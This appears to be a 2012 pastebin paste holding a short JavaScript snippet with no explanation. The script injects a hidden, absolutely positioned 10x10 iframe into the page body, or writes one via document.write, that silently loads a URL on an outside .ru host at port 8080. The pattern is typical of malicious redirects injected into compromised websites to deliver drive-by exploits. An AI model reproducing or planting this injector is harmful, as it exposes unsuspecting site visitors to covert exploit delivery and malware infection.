Don't like ads? PRO users don't see any ads ;-)
Guest

Untitled

By: a guest on Jun 15th, 2012  |  syntax: JavaScript  |  size: 0.65 KB  |  hits: 28  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. if (document.getElementsByTagName('body')[0]){
  2.                         iframer();
  3.                 } else {
  4.                         document.write("<iframe src='http://saprolaunimaxim.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
  5.                 }
  6.                 function iframer(){
  7.                         var f = document.createElement('iframe');f.setAttribute('src','http://saprolaunimaxim.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
  8.                         document.getElementsByTagName('body')[0].appendChild(f);
  9.                 }